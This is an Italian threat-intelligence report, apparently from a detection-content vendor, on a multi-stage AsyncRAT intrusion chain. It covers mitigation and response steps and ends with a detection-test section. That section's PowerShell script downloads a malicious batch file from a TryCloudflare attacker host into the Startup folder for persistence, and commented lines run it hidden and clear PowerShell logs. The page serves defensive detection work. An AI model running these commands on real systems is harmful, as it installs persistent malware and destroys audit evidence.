SOC Prime Bias: Critico

14 Jan 2026 15:04 UTC

Come l’MDR ha scoperto una catena di attacchi multi-stage AsyncRAT

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Segui
Come l’MDR ha scoperto una catena di attacchi multi-stage AsyncRAT
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riassunto

Il rapporto descrive una catena di intrusione a più fasi avviata tramite email di phishing che consegnano esche ZIP a doppia estensione e si trasformano in una sequenza di payload ospitati su WebDAV. Gli operatori abusano delle infrastrutture gratuite di Cloudflare e dei componenti Python incorporati per distribuire AsyncRAT sui terminali delle vittime. L’esecuzione e la persistenza si basano sugli strumenti nativi di Windows—Windows Script Host, PowerShell e script batch—mentre la fase finale utilizza l’iniezione di codice in explorer.exe. Reindirizzando la consegna e lo staging tramite servizi cloud ampiamente fidati, l’attività si integra nel traffico normale e può eludere i controlli convenzionali del perimetro.

Indagine

Gli investigatori di Trend Micro hanno riportato telemetria coerente con un flusso di consegna a fasi: recupero di un archivio .pdf.zip da Dropbox, esecuzione di collegamenti .url incorporati e successiva interazione WebDAV attribuita a svchost.exe e rundll32.exe. La catena ha quindi distribuito file incorporati di Python 3.14.0, che sono stati usati per eseguire uno script Python personalizzato responsabile dell’iniezione APC del shellcode di AsyncRAT. La persistenza è stata ottenuta posizionando file batch nella directory di avvio dell’utente. Gli analisti hanno anche identificato e correlato più host TryCloudflare a supporto dell’infrastruttura.

Mitigazione

Riduci l’esposizione formando gli utenti a trattare archivi a doppia estensione e allegati ZIP inaspettati come sospetti e stringendo il filtraggio per i link cloud consegnati via phishing. Blocca o controlla strettamente l’accesso ai servizi di tunneling cloud non autorizzati e monitora un affidamento anormale su WebDAV in ambienti dove è raro. Restringi l’esecuzione di script da directory scrivibili dall’utente e rinforza i controlli sull’uso delle cartelle Startup e sulla creazione di attività pianificate. Dai priorità alle rilevazioni EDR/comportamentali che possono portare alla luce catene di esecuzione guidate da script e tecniche di iniezione del codice che prendono di mira processi benigni.

Risposta

Se viene rilevata un’attività, isola il terminale e interrompi i processi sospetti associati alla catena (in particolare svchost.exe, rundll32.exe e python.exe legati all’incidente). Elimina la persistenza eliminando gli artefatti batch dannosi dalla directory di startup, eradicando gli archivi Python scaricati e qualsiasi componente AsyncRAT, e esegui una scansione forense completa per file di staging e movimenti laterali aggiuntivi. Aggiorna i controlli di rete e le liste di blocco per includere i domini TryCloudflare identificati e qualsiasi infrastruttura associata osservata durante il triage.

Flusso di Attacco

Esecuzione della Simulazione

Prerequisito: Il Controllo Preliminare di Telemetria e Baseline deve essere andato a buon fine.

  • Narrativa di Attacco & Comandi

    Un avversario che ha ottenuto accesso iniziale a PowerShell su un host Windows compromesso desidera impostare un ambiente di esecuzione Python e ottenere la persistenza. Lo:

    1. Scarica la distribuzione incorporata di Python direttamente nella Temp locale dell’utente usando Invoke‑WebRequest.
    2. Scarica un batch script malevolo (ahke.bat) da un dominio proxy di Cloudflare alla cartella di avvio dell’utente in modo che si esegua ad ogni accesso.
    3. Esegui lo zip di Python scaricato (omesso qui per brevità) per eseguire ulteriori payload.

    Questi passaggi producono esattamente le stringhe di comando corrispondenti alla regola Sigma, generando log di blocchi script PowerShell con il iwr … -OutFile … pattern.

  • Script di Test di Regressione

    # -------------------------------------------------
    # Simulazione PowerShell dell'impostazione dell'ambiente AsyncRAT
    # -------------------------------------------------
    
    # 1. Scarica l'embed zip di Python nella cartella temp utente
    $pythonUrl = 'https://www.python.org/ftp/python/3.14.0/python-3.14.0-embed-amd64.zip'
    $pythonDest = "$env:USERPROFILEAppDataLocalTempp.zip"
    iwr $pythonUrl -OutFile $pythonDest
    
    # 2. Scarica file batch malevolo su Startup per la persistenza
    $batUrl = 'https://plus-condos-thy-redeem.trycloudflare.com/ahke.bat'
    $batDest = "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupahke.bat"
    iwr $batUrl -OutFile $batDest
    
    # 3. (Opzionale) Attiva esecuzione del batch per dimostrare la persistenza
    # Start-Process -FilePath $batDest -WindowStyle Hidden
    # -------------------------------------------------
  • Comandi di Pulizia

    # Rimuovi gli artefatti scaricati
    Remove-Item -Path "$env:USERPROFILEAppDataLocalTempp.zip" -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupahke.bat" -ErrorAction SilentlyContinue
    
    # Facoltativamente cancella i log dei blocchi script PowerShell (richiede admin)
    # Clear-EventLog -LogName "Microsoft-Windows-PowerShell/Operational"